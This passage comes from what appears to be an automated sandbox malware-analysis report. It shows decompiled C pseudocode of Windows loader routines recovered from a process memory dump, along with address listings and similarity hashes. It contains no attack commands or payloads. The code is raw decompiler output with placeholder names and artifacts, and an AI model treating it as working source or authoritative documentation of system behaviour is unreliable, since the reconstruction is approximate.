                            				signed int _t130;
                            				void* _t132;
                            				signed char _t133;
                            				intOrPtr _t135;
                            				signed int _t137;
                            				signed int _t140;
                            				signed int* _t144;
                            				signed int* _t145;
                            				intOrPtr _t146;
                            				signed int _t147;
                            				signed char* _t148;
                            				signed int _t149;
                            				signed int _t153;
                            				signed int _t169;
                            				signed int _t174;
                            				signed int _t180;
                            				void* _t197;
                            				void* _t198;
                            				signed int _t201;
                            				intOrPtr* _t202;
                            				intOrPtr* _t205;
                            				signed int _t210;
                            				signed int _t215;
                            				signed int _t218;
                            				signed char _t221;
                            				signed int _t226;
                            				char _t227;
                            				signed int _t228;
                            				void* _t229;
                            				unsigned int _t231;
                            				void* _t235;
                            				signed int _t240;
                            				signed int _t241;
                            				void* _t242;
                            				signed int _t246;
                            				signed int _t248;
                            				signed int _t252;
                            				signed int _t253;
                            				void* _t254;
                            				intOrPtr* _t256;
                            				intOrPtr _t257;
                            				unsigned int _t262;
                            				signed int _t265;
                            				void* _t267;
                            				signed int _t275;
                            
                            				_t198 = __ebx;
                            				_t267 = (_t265 & 0xfffffff0) - 0x48;
                            				_v68 = __ecx;
                            				_v73 = 0;
                            				_t201 = __edx & 0x00002000;
                            				_t128 = __edx & 0xffffdfff;
                            				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                            				_v72 = _t128;
                            				if((_t128 & 0x00000008) != 0) {
                            					__eflags = _t128 - 8;
                            					if(_t128 != 8) {
                            						L69:
                            						_t129 = 0xc000000d;
                            						goto L23;
                            					} else {
                            						_t130 = 0;
                            						_v72 = 0;
                            						_v75 = 1;
                            						L2:
                            						_v74 = 1;
                            						_t226 =  *0x13d8714; // 0x0
                            						if(_t226 != 0) {
                            							__eflags = _t201;
                            							if(_t201 != 0) {
                            								L62:
                            								_v74 = 1;
                            								L63:
                            								_t130 = _t226 & 0xffffdfff;
                            								_v72 = _t130;
                            								goto L3;
                            							}
                            							_v74 = _t201;
                            							__eflags = _t226 & 0x00002000;
                            							if((_t226 & 0x00002000) == 0) {
                            								goto L63;
                            							}
                            							goto L62;
                            						}
                            						L3:
                            						_t227 = _v75;
                            						L4:
                            						_t240 = 0;
                            						_v56 = 0;
                            						_t252 = _t130 & 0x00000100;
                            						if(_t252 != 0 || _t227 != 0) {
                            							_t240 = _v68;
                            							_t132 = E01312EB0(_t240);
                            							__eflags = _t132 - 2;
                            							if(_t132 != 2) {
                            								__eflags = _t132 - 1;
                            								if(_t132 == 1) {
                            									goto L25;
                            								}
                            								__eflags = _t132 - 6;
                            								if(_t132 == 6) {
                            									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                            									if( *((short*)(_t240 + 4)) != 0x3f) {
                            										goto L40;
                            									}
                            									_t197 = E01312EB0(_t240 + 8);
                            									__eflags = _t197 - 2;
                            									if(_t197 == 2) {
                            										goto L25;
                            									}
                            								}
                            								L40:
                            								_t133 = 1;
                            								L26:
                            								_t228 = _v75;
                            								_v56 = _t240;
                            								__eflags = _t133;
                            								if(_t133 != 0) {
                            									__eflags = _t228;
                            									if(_t228 == 0) {
                            										L43:
                            										__eflags = _v72;
                            										if(_v72 == 0) {
                            											goto L8;
                            										}
                            										goto L69;
                            									}
                            									_t133 = E012E58EC(_t240);
                            									_t221 =  *0x13d5cac; // 0x16
                            									__eflags = _t221 & 0x00000040;
                            									if((_t221 & 0x00000040) != 0) {
                            										_t228 = 0;
                            										__eflags = _t252;
                            										if(_t252 != 0) {
                            											goto L43;
                            										}
                            										_t133 = _v72;
                            										goto L7;
                            									}
                            									goto L43;
                            								} else {
                            									_t133 = _v72;
                            									goto L6;
                            								}
                            							}
                            							L25:
                            							_t133 = _v73;
                            							goto L26;
                            						} else {
                            							L6:
                            							_t221 =  *0x13d5cac; // 0x16
                            							L7:
                            							if(_t133 != 0) {
                            								__eflags = _t133 & 0x00001000;
                            								if((_t133 & 0x00001000) != 0) {
                            									_t133 = _t133 | 0x00000a00;
                            									__eflags = _t221 & 0x00000004;
                            									if((_t221 & 0x00000004) != 0) {
                            										_t133 = _t133 | 0x00000400;
                            									}
                            								}
                            								__eflags = _t228;
                            								if(_t228 != 0) {
                            									_t133 = _t133 | 0x00000100;
                            								}
                            								_t229 = E01324A2C(0x13d6e40, 0x1324b30, _t133, _t240);
                            								__eflags = _t229;
                            								if(_t229 == 0) {
                            									_t202 = _a20;
                            									goto L100;
                            								} else {
                            									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                            									L15:
                            									_t202 = _a20;
                            									 *_t202 = _t135;
                            									if(_t229 == 0) {
                            										L100:
                            										 *_a4 = 0;
                            										_t137 = _a8;
                            										__eflags = _t137;
                            										if(_t137 != 0) {
                            											 *_t137 = 0;
                            										}
                            										 *_t202 = 0;
                            										_t129 = 0xc0000017;
                            										goto L23;
                            									} else {
                            										_t242 = _a16;
                            										if(_t242 != 0) {
                            											_t254 = _t229;
                            											memcpy(_t242, _t254, 0xd << 2);
                            											_t267 = _t267 + 0xc;
                            											_t242 = _t254 + 0x1a;
                            										}
                            										_t205 = _a4;
                            										_t25 = _t229 + 0x48; // 0x48
                            										 *_t205 = _t25;
                            										_t140 = _a8;
                            										if(_t140 != 0) {
                            											__eflags =  *((char*)(_t267 + 0xa));
                            											if( *((char*)(_t267 + 0xa)) != 0) {
                            												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                            											} else {
                            												 *_t140 = 0;
                            											}
                            										}
                            										_t256 = _a12;
                            										if(_t256 != 0) {
                            											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                            										}
                            										_t257 =  *_t205;
                            										_v48 = 0;
                            										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                            										_v56 = 0;
                            										_v52 = 0;
                            										_t144 =  *( *[fs:0x30] + 0x50);
                            										if(_t144 != 0) {
                            											__eflags =  *_t144;
                            											if( *_t144 == 0) {
                            												goto L20;
                            											}
                            											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                            											goto L21;
                            										} else {
                            											L20:
                            											_t145 = 0x7ffe0384;
                            											L21:
                            											if( *_t145 != 0) {
                            												_t146 =  *[fs:0x30];
                            												__eflags =  *(_t146 + 0x240) & 0x00000004;
                            												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                            													_t147 = E01307D50();
                            													__eflags = _t147;
                            													if(_t147 == 0) {
                            														_t148 = 0x7ffe0385;
                            													} else {
                            														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                            													}
                            													__eflags =  *_t148 & 0x00000020;
                            													if(( *_t148 & 0x00000020) != 0) {
                            														_t149 = _v72;
                            														__eflags = _t149;
                            														if(__eflags == 0) {
                            															_t149 = 0x12c5c80;
                            														}
                            														_push(_t149);
                            														_push( &_v48);
                            														 *((char*)(_t267 + 0xb)) = E0131F6E0(_t198, _t242, _t257, __eflags);
                            														_push(_t257);
                            														_push( &_v64);
                            														_t153 = E0131F6E0(_t198, _t242, _t257, __eflags);
                            														__eflags =  *((char*)(_t267 + 0xb));
                            														if( *((char*)(_t267 + 0xb)) != 0) {
                            															__eflags = _t153;
                            															if(_t153 != 0) {
                            																__eflags = 0;
                            																E01367016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                            																L01302400(_t267 + 0x20);
                            															}
                            															L01302400( &_v64);
                            														}
                            													}
                            												}
                            											}
                            											_t129 = 0;
                            											L23:
                            											return _t129;
                            										}
                            									}
                            								}
                            							}
                            							L8:
                            							_t275 = _t240;
                            							if(_t275 != 0) {
                            								_v73 = 0;
                            								_t253 = 0;
                            								__eflags = 0;
                            								L29:
                            								_push(0);
                            								_t241 = E01312397(_t240);
                            								__eflags = _t241;
                            								if(_t241 == 0) {
                            									_t229 = 0;
                            									L14:
                            									_t135 = 0;
                            									goto L15;
                            								}
                            								__eflags =  *((char*)(_t267 + 0xb));
                            								 *(_t241 + 0x34) = 1;
                            								if( *((char*)(_t267 + 0xb)) != 0) {
                            									E01302280(_t134, 0x13d8608);
                            									__eflags =  *0x13d6e48 - _t253; // 0x0
                            									if(__eflags != 0) {
                            										L48:
                            										_t253 = 0;
                            										__eflags = 0;
                            										L49:
                            										E012FFFB0(_t198, _t241, 0x13d8608);
                            										__eflags = _t253;
                            										if(_t253 != 0) {
                            											L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                            										}
                            										goto L31;
                            									}
                            									 *0x13d6e48 = _t241;
                            									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                            									__eflags = _t253;
                            									if(_t253 != 0) {
                            										_t57 = _t253 + 0x34;
                            										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                            										__eflags =  *_t57;
                            										if( *_t57 == 0) {
                            											goto L49;
                            										}
                            									}
                            									goto L48;
                            								}
                            								L31:
                            								_t229 = _t241;
                            								goto L14;
                            							}
                            							_v73 = 1;
                            							_v64 = _t240;
                            							asm("lock bts dword [esi], 0x0");
                            							if(_t275 < 0) {
                            								_t231 =  *0x13d8608; // 0x0
                            								while(1) {
                            									_v60 = _t231;
                            									__eflags = _t231 & 0x00000001;
                            									if((_t231 & 0x00000001) != 0) {
                            										goto L76;
                            									}
                            									_t73 = _t231 + 1; // 0x1
                            									_t210 = _t73;
                            									asm("lock cmpxchg [edi], ecx");
                            									__eflags = _t231 - _t231;
                            									if(_t231 != _t231) {
                            										L92:
                            										_t133 = E01316B90(_t210,  &_v64);
                            										_t262 =  *0x13d8608; // 0x0
                            										L93:
                            										_t231 = _t262;
                            										continue;
                            									}
                            									_t240 = _v56;
                            									goto L10;
                            									L76:
                            									_t169 = E0131E180(_t133);
                            									__eflags = _t169;
                            									if(_t169 != 0) {
                            										_push(0xc000004b);
                            										_push(0xffffffff);
                            										E013297C0();
                            										_t231 = _v68;
                            									}
                            									_v72 = 0;
                            									_v24 =  *( *[fs:0x18] + 0x24);
                            									_v16 = 3;
                            									_v28 = 0;
                            									__eflags = _t231 & 0x00000002;
                            									if((_t231 & 0x00000002) == 0) {
                            										_v32 =  &_v36;
                            										_t174 = _t231 >> 4;
                            										__eflags = 1 - _t174;
                            										_v20 = _t174;
                            										asm("sbb ecx, ecx");
                            										_t210 = 3 |  &_v36;
                            										__eflags = _t174;
                            										if(_t174 == 0) {
                            											_v20 = 0xfffffffe;
                            										}
                            									} else {
                            										_v32 = 0;
                            										_v20 = 0xffffffff;
                            										_v36 = _t231 & 0xfffffff0;
                            										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                            										_v72 =  !(_t231 >> 2) & 0xffffff01;
                            									}
                            									asm("lock cmpxchg [edi], esi");
                            									_t262 = _t231;
                            									__eflags = _t262 - _t231;
                            									if(_t262 != _t231) {
                            										goto L92;
                            									} else {
                            										__eflags = _v72;
                            										if(_v72 != 0) {
                            											E0132006A(0x13d8608, _t210);
                            										}
                            										__eflags =  *0x7ffe036a - 1;
                            										if(__eflags <= 0) {
                            											L89:
                            											_t133 =  &_v16;
                            											asm("lock btr dword [eax], 0x1");
                            											if(__eflags >= 0) {
                            												goto L93;
                            											} else {
                            												goto L90;
                            											}
                            											do {
                            												L90:
                            												_push(0);
                            												_push(0x13d8608);
                            												E0132B180();
                            												_t133 = _v24;
                            												__eflags = _t133 & 0x00000004;
                            											} while ((_t133 & 0x00000004) == 0);
                            											goto L93;
                            										} else {
                            											_t218 =  *0x13d6904; // 0x400
                            											__eflags = _t218;
                            											if(__eflags == 0) {
                            												goto L89;
                            											} else {
                            												goto L87;
                            											}
                            											while(1) {
                            												L87:
                            												__eflags = _v16 & 0x00000002;
                            												if(__eflags == 0) {
                            													goto L89;
                            												}
                            												asm("pause");
                            												_t218 = _t218 - 1;
                            												__eflags = _t218;
                            												if(__eflags != 0) {
                            													continue;
                            												}
                            												goto L89;
                            											}
                            											goto L89;
                            										}
                            									}
                            								}
                            							}
                            							L10:
                            							_t229 =  *0x13d6e48; // 0x0
                            							_v72 = _t229;
                            							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                            								E012FFFB0(_t198, _t240, 0x13d8608);
                            								_t253 = _v76;
                            								goto L29;
                            							} else {
                            								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                            								asm("lock cmpxchg [esi], ecx");
                            								_t215 = 1;
                            								if(1 != 1) {
                            									while(1) {
                            										_t246 = _t215 & 0x00000006;
                            										_t180 = _t215;
                            										__eflags = _t246 - 2;
                            										_v56 = _t246;
                            										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                            										asm("lock cmpxchg [edi], esi");
                            										_t248 = _v56;
                            										__eflags = _t180 - _t215;
                            										if(_t180 == _t215) {
                            											break;
                            										}
                            										_t215 = _t180;
                            									}
                            									__eflags = _t248 - 2;
                            									if(_t248 == 2) {
                            										__eflags = 0;
                            										E013200C2(0x13d8608, 0, _t235);
                            									}
                            									_t229 = _v72;
                            								}
                            								goto L14;
                            							}
                            						}
                            					}
                            				}
                            				_t227 = 0;
                            				_v75 = 0;
                            				if(_t128 != 0) {
                            					goto L4;
                            				}
                            				goto L2;
                            			}
                            0x0135586c
                            0x01355871
                            0x01355875
                            0x01355877
                            0x01355997
                            0x0135599c
                            0x013559a1
                            0x013559a7
                            0x013559a7
                            0x00000000
                            0x013559a7
                            0x0135587d
                            0x00000000
                            0x0135588b
                            0x0135588b
                            0x01355890
                            0x01355892
                            0x01355894
                            0x01355899
                            0x0135589b
                            0x013558a0
                            0x013558a0
                            0x013558aa
                            0x013558b2
                            0x013558b6
                            0x013558be
                            0x013558c6
                            0x013558c9
                            0x0135590d
                            0x01355917
                            0x0135591a
                            0x0135591c
                            0x01355920
                            0x01355928
                            0x0135592a
                            0x0135592c
                            0x0135592e
                            0x0135592e
                            0x013558cb
                            0x013558cd
                            0x013558d8
                            0x013558e0
                            0x013558f4
                            0x013558fe
                            0x013558fe
                            0x0135593a
                            0x0135593e
                            0x01355940
                            0x01355942
                            0x00000000
                            0x01355944
                            0x01355944
                            0x01355949
                            0x0135594e
                            0x0135594e
                            0x01355953
                            0x0135595b
                            0x01355976
                            0x01355976
                            0x0135597a
                            0x0135597f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01355981
                            0x01355981
                            0x01355981
                            0x01355983
                            0x01355988
                            0x0135598d
                            0x01355991
                            0x01355991
                            0x00000000
                            0x0135595d
                            0x0135595d
                            0x01355963
                            0x01355965
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01355967
                            0x01355967
                            0x0135596b
                            0x0135596d
                            0x00000000
                            0x00000000
                            0x0135596f
                            0x01355971
                            0x01355971
                            0x01355974
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01355974
                            0x00000000
                            0x01355967
                            0x0135595b
                            0x01355942
                            0x01355863
                            0x01312143
                            0x01312143
                            0x01312149
                            0x0131214f
                            0x013122f1
                            0x013122f6
                            0x00000000
                            0x01312173
                            0x01312173
                            0x0131217d
                            0x01312181
                            0x01312186
                            0x013559ae
                            0x013559b2
                            0x013559b5
                            0x013559b7
                            0x013559ba
                            0x013559cd
                            0x013559d1
                            0x013559d5
                            0x013559d9
                            0x013559db
                            0x00000000
                            0x00000000
                            0x013559dd
                            0x013559dd
                            0x013559e1
                            0x013559e4
                            0x013559e7
                            0x013559ee
                            0x013559ee
                            0x013559f3
                            0x013559f3
                            0x00000000
                            0x01312186
                            0x0131214f
                            0x01312106
                            0x01312266
                            0x013120d8
                            0x013120da
                            0x013120e0
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a815768604803bd8927b60c73fb5372c9883e87f294892d89fb92aaac3e99c0
                            • Instruction ID: 84055178aa2104b482d473d93204c64ea98637245edc6bf5c5b72515c9ed9429
                            • Opcode Fuzzy Hash: 2a815768604803bd8927b60c73fb5372c9883e87f294892d89fb92aaac3e99c0
                            • Instruction Fuzzy Hash: 19F117356083419FE76ACF2CC440B6B7BE5AF8572CF24852DED999B285D734E841CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E012FD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                            				signed int _v8;
                            				intOrPtr _v20;
                            				signed int _v36;
                            				intOrPtr* _v40;
                            				signed int _v44;
                            				signed int _v48;
                            				signed char _v52;
                            				signed int _v60;
                            				signed int _v64;
                            				signed int _v68;
                            				signed int _v72;
                            				signed int _v76;
                            				intOrPtr _v80;
                            				signed int _v84;
                            				intOrPtr _v100;
                            				intOrPtr _v104;
                            				signed int _v108;
                            				signed int _v112;
                            				signed int _v116;
                            				intOrPtr _v120;
                            				signed int _v132;
                            				char _v140;
                            				char _v144;
                            				char _v157;
                            				signed int _v164;
                            				signed int _v168;
                            				signed int _v169;
                            				intOrPtr _v176;
                            				signed int _v180;
                            				signed int _v184;
                            				intOrPtr _v188;
                            				signed int _v192;
                            				signed int _v200;
                            				signed int _v208;
                            				intOrPtr* _v212;
                            				char _v216;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t204;
                            				void* _t208;
                            				signed int _t211;
                            				signed int _t216;
                            				intOrPtr _t217;
                            				intOrPtr* _t218;
                            				signed int _t226;
                            				signed int _t239;
                            				signed int* _t247;
                            				signed int _t249;
                            				void* _t252;
                            				signed int _t256;
                            				signed int _t269;
                            				signed int _t271;
                            				signed int _t277;
                            				signed int _t279;
                            				intOrPtr _t283;
                            				signed int _t287;
                            				signed int _t288;
                            				void* _t289;
                            				signed char _t290;
                            				signed int _t292;
                            				signed int* _t293;
                            				signed int _t306;
                            				signed int _t307;
                            				signed int _t308;
                            				signed int _t309;
                            				signed int _t310;
                            				intOrPtr _t311;
                            				intOrPtr _t312;
                            				signed int _t319;
                            				signed int _t320;
                            				signed int* _t324;
                            				signed int _t337;
                            				signed int _t338;
                            				signed int _t339;
                            				signed int* _t340;
                            				void* _t341;
                            				signed int _t344;
                            				signed int _t348;
                            				signed int _t349;
                            				signed int _t351;
                            				intOrPtr _t353;
                            				void* _t354;
                            				signed int _t356;
                            				signed int _t358;
                            				intOrPtr _t359;
                            				signed int _t363;
                            				signed short* _t365;
                            				void* _t367;
                            				intOrPtr _t369;
                            				void* _t370;
                            				signed int _t371;
                            				signed int _t372;
                            				void* _t374;
                            				signed int _t376;
                            				void* _t384;
                            				signed int _t387;
                            
                            				_v8 =  *0x13dd360 ^ _t376;
                            				_t2 =  &_a20;
                            				 *_t2 = _a20 & 0x00000001;
                            				_t287 = _a4;
                            				_v200 = _a12;
                            				_t365 = _a8;
                            				_v212 = _a16;
                            				_v180 = _a24;
                            				_v168 = 0;
                            				_v157 = 0;
                            				if( *_t2 != 0) {
                            					__eflags = E012F6600(0x13d52d8);
                            					if(__eflags == 0) {
                            						goto L1;
                            					} else {
                            						_v188 = 6;
                            					}
                            				} else {
                            					L1:
                            					_v188 = 9;
                            				}
                            				if(_t365 == 0) {
                            					_v164 = 0;
                            					goto L5;
                            				} else {
                            					_t363 =  *_t365 & 0x0000ffff;
                            					_t341 = _t363 + 1;
                            					if((_t365[1] & 0x0000ffff) < _t341) {
                            						L109:
                            						__eflags = _t341 - 0x80;
                            						if(_t341 <= 0x80) {
                            							_t281 =  &_v140;
                            							_v164 =  &_v140;
                            							goto L114;
                            						} else {
                            							_t283 =  *0x13d7b9c; // 0x0
                            							_t281 = L01304620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                            							_v164 = _t281;
                            							__eflags = _t281;
                            							if(_t281 != 0) {
                            								_v157 = 1;
                            								L114:
                            								E0132F3E0(_t281, _t365[2], _t363);
                            								_t200 = _v164;
                            								 *((char*)(_v164 + _t363)) = 0;
                            								goto L5;
                            							} else {
                            								_t204 = 0xc000009a;
                            								goto L47;
                            							}
                            						}
                            					} else {
                            						_t200 = _t365[2];
                            						_v164 = _t200;
                            						if( *((char*)(_t200 + _t363)) != 0) {
                            							goto L109;
                            						} else {
                            							while(1) {
                            								L5:
                            								_t353 = 0;
                            								_t342 = 0x1000;
                            								_v176 = 0;
                            								if(_t287 == 0) {
                            									break;
                            								}
                            								_t384 = _t287 -  *0x13d7b90; // 0x779c0000
                            								if(_t384 == 0) {
                            									_t353 =  *0x13d7b8c; // 0xdb2a78
                            									_v176 = _t353;
                            									_t320 = ( *(_t353 + 0x50))[8];
                            									_v184 = _t320;
                            								} else {
                            									E01302280(_t200, 0x13d84d8);
                            									_t277 =  *0x13d85f4; // 0xdb2f68
                            									_t351 =  *0x13d85f8 & 1;
                            									while(_t277 != 0) {
                            										_t337 =  *(_t277 - 0x50);
                            										if(_t337 > _t287) {
                            											_t338 = _t337 | 0xffffffff;
                            										} else {
                            											asm("sbb ecx, ecx");
                            											_t338 =  ~_t337;
                            										}
                            										_t387 = _t338;
                            										if(_t387 < 0) {
                            											_t339 =  *_t277;
                            											__eflags = _t351;
                            											if(_t351 != 0) {
                            												__eflags = _t339;
                            												if(_t339 == 0) {
                            													goto L16;
                            												} else {
                            													goto L118;
                            												}
                            												goto L151;
                            											} else {
                            												goto L16;
                            											}
                            											goto L17;
                            										} else {
                            											if(_t387 <= 0) {
                            												__eflags = _t277;
                            												if(_t277 != 0) {
                            													_t340 =  *(_t277 - 0x18);
                            													_t24 = _t277 - 0x68; // 0xdb2f00
                            													_t353 = _t24;
                            													_v176 = _t353;
                            													__eflags = _t340[3] - 0xffffffff;
                            													if(_t340[3] != 0xffffffff) {
                            														_t279 =  *_t340;
                            														__eflags =  *(_t279 - 0x20) & 0x00000020;
                            														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                            															asm("lock inc dword [edi+0x9c]");
                            															_t340 =  *(_t353 + 0x50);
                            														}
                            													}
                            													_v184 = _t340[8];
                            												}
                            											} else {
                            												_t339 =  *(_t277 + 4);
                            												if(_t351 != 0) {
                            													__eflags = _t339;
                            													if(_t339 == 0) {
                            														goto L16;
                            													} else {
                            														L118:
                            														_t277 = _t277 ^ _t339;
                            														goto L17;
                            													}
                            													goto L151;
                            												} else {
                            													L16:
                            													_t277 = _t339;
                            												}
                            												goto L17;
                            											}
                            										}
                            										goto L25;
                            										L17:
                            									}
                            									L25:
                            									E012FFFB0(_t287, _t353, 0x13d84d8);
                            									_t320 = _v184;
                            									_t342 = 0x1000;
                            								}
                            								if(_t353 == 0) {
                            									break;
                            								} else {
                            									_t366 = 0;
                            									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                            										_t288 = _v164;
                            										if(_t353 != 0) {
                            											_t342 = _t288;
                            											_t374 = E0133CC99(_t353, _t288, _v200, 1,  &_v168);
                            											if(_t374 >= 0) {
                            												if(_v184 == 7) {
                            													__eflags = _a20;
                            													if(__eflags == 0) {
                            														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                            														if(__eflags != 0) {
                            															_t271 = E012F6600(0x13d52d8);
                            															__eflags = _t271;
                            															if(__eflags == 0) {
                            																_t342 = 0;
                            																_v169 = _t271;
                            																_t374 = E012F7926( *(_t353 + 0x50), 0,  &_v169);
                            															}
                            														}
                            													}
                            												}
                            												if(_t374 < 0) {
                            													_v168 = 0;
                            												} else {
                            													if( *0x13db239 != 0) {
                            														_t342 =  *(_t353 + 0x18);
                            														E0136E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                            													}
                            													if( *0x13d8472 != 0) {
                            														_v192 = 0;
                            														_t342 =  *0x7ffe0330;
                            														asm("ror edi, cl");
                            														 *0x13db1e0( &_v192, _t353, _v168, 0, _v180);
                            														 *( *0x13db218 ^  *0x7ffe0330)();
                            														_t269 = _v192;
                            														_t353 = _v176;
                            														__eflags = _t269;
                            														if(__eflags != 0) {
                            															_v168 = _t269;
                            														}
                            													}
                            												}
                            											}
                            											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                            												_t366 = 0xc000007a;
                            											}
                            											_t247 =  *(_t353 + 0x50);
                            											if(_t247[3] == 0xffffffff) {
                            												L40:
                            												if(_t366 == 0xc000007a) {
                            													__eflags = _t288;
                            													if(_t288 == 0) {
                            														goto L136;
                            													} else {
                            														_t366 = 0xc0000139;
                            													}
                            													goto L54;
                            												}
                            											} else {
                            												_t249 =  *_t247;
                            												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                            													goto L40;
                            												} else {
                            													_t250 = _t249 | 0xffffffff;
                            													asm("lock xadd [edi+0x9c], eax");
                            													if((_t249 | 0xffffffff) == 0) {
                            														E01302280(_t250, 0x13d84d8);
                            														_t342 =  *(_t353 + 0x54);
                            														_t165 = _t353 + 0x54; // 0x54
                            														_t252 = _t165;
                            														__eflags =  *(_t342 + 4) - _t252;
                            														if( *(_t342 + 4) != _t252) {
                            															L135:
                            															asm("int 0x29");
                            															L136:
                            															_t288 = _v200;
                            															_t366 = 0xc0000138;
                            															L54:
                            															_t342 = _t288;
                            															L01323898(0, _t288, _t366);
                            														} else {
                            															_t324 =  *(_t252 + 4);
                            															__eflags =  *_t324 - _t252;
                            															if( *_t324 != _t252) {
                            																goto L135;
                            															} else {
                            																 *_t324 = _t342;
                            																 *(_t342 + 4) = _t324;
                            																_t293 =  *(_t353 + 0x50);
                            																_v180 =  *_t293;
                            																E012FFFB0(_t293, _t353, 0x13d84d8);
                            																__eflags =  *((short*)(_t353 + 0x3a));
                            																if( *((short*)(_t353 + 0x3a)) != 0) {
                            																	_t342 = 0;
                            																	__eflags = 0;
                            																	E013237F5(_t353, 0);
                            																}
                            																E01320413(_t353);
                            																_t256 =  *(_t353 + 0x48);
                            																__eflags = _t256;
                            																if(_t256 != 0) {
                            																	__eflags = _t256 - 0xffffffff;
                            																	if(_t256 != 0xffffffff) {
                            																		E01319B10(_t256);
                            																	}
                            																}
                            																__eflags =  *(_t353 + 0x28);
                            																if( *(_t353 + 0x28) != 0) {
                            																	_t174 = _t353 + 0x24; // 0x24
                            																	E013102D6(_t174);
                            																}
                            																L013077F0( *0x13d7b98, 0, _t353);
                            																__eflags = _v180 - _t293;
                            																if(__eflags == 0) {
                            																	E0131C277(_t293, _t366);
                            																}
                            																_t288 = _v164;
                            																goto L40;
                            															}
                            														}
                            													} else {
                            														goto L40;
                            													}
                            												}
                            											}
                            										}
                            									} else {
                            										L012FEC7F(_t353);
                            										L013119B8(_t287, 0, _t353, 0);
                            										_t200 = E012EF4E3(__eflags);
                            										continue;
                            									}
                            								}
                            								L41:
                            								if(_v157 != 0) {
                            									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                            								}
                            								if(_t366 < 0 || ( *0x13db2f8 |  *0x13db2fc) == 0 || ( *0x13db2e4 & 0x00000001) != 0) {
                            									L46:
                            									 *_v212 = _v168;
                            									_t204 = _t366;
                            									L47:
                            									_pop(_t354);
                            									_pop(_t367);
                            									_pop(_t289);
                            									return E0132B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                            								} else {
                            									_v200 = 0;
                            									if(( *0x13db2ec >> 0x00000008 & 0x00000003) == 3) {
                            										_t355 = _v168;
                            										_t342 =  &_v208;
                            										_t208 = E01396B68(_v168,  &_v208, _v168, __eflags);
                            										__eflags = _t208 - 1;
                            										if(_t208 == 1) {
                            											goto L46;
                            										} else {
                            											__eflags = _v208 & 0x00000010;
                            											if((_v208 & 0x00000010) == 0) {
                            												goto L46;
                            											} else {
                            												_t342 = 4;
                            												_t366 = E01396AEB(_t355, 4,  &_v216);
                            												__eflags = _t366;
                            												if(_t366 >= 0) {
                            													goto L46;
                            												} else {
                            													asm("int 0x29");
                            													_t356 = 0;
                            													_v44 = 0;
                            													_t290 = _v52;
                            													__eflags = 0;
                            													if(0 == 0) {
                            														L108:
                            														_t356 = 0;
                            														_v44 = 0;
                            														goto L63;
                            													} else {
                            														__eflags = 0;
                            														if(0 < 0) {
                            															goto L108;
                            														}
                            														L63:
                            														_v112 = _t356;
                            														__eflags = _t356;
                            														if(_t356 == 0) {
                            															L143:
                            															_v8 = 0xfffffffe;
                            															_t211 = 0xc0000089;
                            														} else {
                            															_v36 = 0;
                            															_v60 = 0;
                            															_v48 = 0;
                            															_v68 = 0;
                            															_v44 = _t290 & 0xfffffffc;
                            															E012FE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                            															_t306 = _v68;
                            															__eflags = _t306;
                            															if(_t306 == 0) {
                            																_t216 = 0xc000007b;
                            																_v36 = 0xc000007b;
                            																_t307 = _v60;
                            															} else {
                            																__eflags = _t290 & 0x00000001;
                            																if(__eflags == 0) {
                            																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                            																	__eflags = _t349 - 0x10b;
                            																	if(_t349 != 0x10b) {
                            																		__eflags = _t349 - 0x20b;
                            																		if(_t349 == 0x20b) {
                            																			goto L102;
                            																		} else {
                            																			_t307 = 0;
                            																			_v48 = 0;
                            																			_t216 = 0xc000007b;
                            																			_v36 = 0xc000007b;
                            																			goto L71;
                            																		}
                            																	} else {
                            																		L102:
                            																		_t307 =  *(_t306 + 0x50);
                            																		goto L69;
                            																	}
                            																	goto L151;
                            																} else {
                            																	_t239 = L012FEAEA(_t290, _t290, _t356, _t366, __eflags);
                            																	_t307 = _t239;
                            																	_v60 = _t307;
                            																	_v48 = _t307;
                            																	__eflags = _t307;
                            																	if(_t307 != 0) {
                            																		L70:
                            																		_t216 = _v36;
                            																	} else {
                            																		_push(_t239);
